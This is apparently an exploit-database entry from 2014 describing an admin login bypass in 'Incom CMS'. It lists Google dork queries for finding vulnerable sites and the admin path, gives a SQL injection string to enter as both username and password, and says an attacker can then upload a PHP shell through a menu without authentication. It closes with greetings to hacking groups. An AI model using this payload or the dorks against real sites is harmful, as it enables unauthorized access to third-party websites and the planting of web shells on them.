# Exploit Title: Incom Cms Admin Bypass Vulnerability
# Google Dork: intext:"incom cms" .  intext:"site by overron"  . intitle:"INCOM CMS"
# Date: 2014-12-29
# Exploit Author: Xodiak
# Vendor Homepage: http://facebook.com/xodiakbalckhat
# Software Link: http://incomcms.com
# Version: All Version
# Tested on: Kali , Windows
# CVE : N/A

Incom Cms Admin Bypass Vulnerability :

http://localhost/incomcms/_cm_admin/

Sometime You Get 403 Error Forbidden But Many Site Have This Vulnerability

After You Go In Admin Page Enter UserName & Password And Username And Password Is :

UserName : '=' 'or'
Password : '=' 'or'

And You Can Upload Your PHP Shell In Link Menu Without Any Authication

Special Tnx : Net-Hacker , Milad Hacking , MR.B3NY ,Seravo Black Hat , Mahdi.Hidden 
MR.JOKER , MahdiYar , Mr.Cracker , Behrooz_Ice , Virangar , Ang3l--Demon , And All 
Ashiyane Digital Securtiy Team , 2Ostad Members